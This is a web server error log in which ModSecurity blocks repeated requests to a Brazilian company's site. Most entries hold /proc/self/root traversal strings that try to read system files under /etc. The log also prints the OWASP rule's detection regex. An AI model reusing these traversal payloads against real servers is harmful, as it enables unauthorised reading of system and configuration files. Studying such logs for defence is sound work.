[Fri Mar 20 05:02:40.293035 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.241.31:57916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_ILninkcc-iUj5Ao8BQAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:02:59.245204 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:35970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_M7ninkcc-iUj5Ao8HgAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:03:03.908922 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:57620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_N_qxLDW4GITHUkS_6AAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:03:38.647485 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:59804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_WhCii7xarUs8iHZDXwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:03:39.975516 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:35400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_W_XLqtnMIWvjpaJ3YgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:03:40.031017 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:57628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_XDJ3M9BSuKP7CAbvkAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:03:41.323313 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:35416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_XfqxLDW4GITHUkS__QAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:03:46.082732 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:36666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_YgF0L0L-SsrnPo5F0wAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:04:11.926744 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:36680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_e7ninkcc-iUj5Ao8WAAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:05:31.581214 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:47266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_yjJ3M9BSuKP7CAbwTAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:05:36.451373 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:36324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_0Lninkcc-iUj5Ao8dAAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:05:41.318950 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:36334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_1QF0L0L-SsrnPo5GIwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 05:06:14.749137 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:52178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz_9gF0L0L-SsrnPo5GSQAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:06:23.986713 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:43640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz__zJ3M9BSuKP7CAbweAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:06:28.288595 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:41590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ABBCii7xarUs8iHZEHAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:06:31.743178 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:57308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ABzJ3M9BSuKP7CAbwgAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:06:38.797797 2026] [mime_magic:error] [pid 11642:tid 140411699963648] (70014)End of file found: [client 57.141.18.39:33440] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:06:43.232469 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:57316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AExCii7xarUs8iHZEPgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:07:43.468325 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:57204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ATwF0L0L-SsrnPo5GmwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:07:49.356337 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.241.31:57352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AVfqxLDW4GITHUkTAnQAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:13.218770 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.241.31:58346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0AbfHIg5MgXLBnicPYYQAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:08:14.451446 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:37268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Abta6ubjKNq_cu4avbAAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
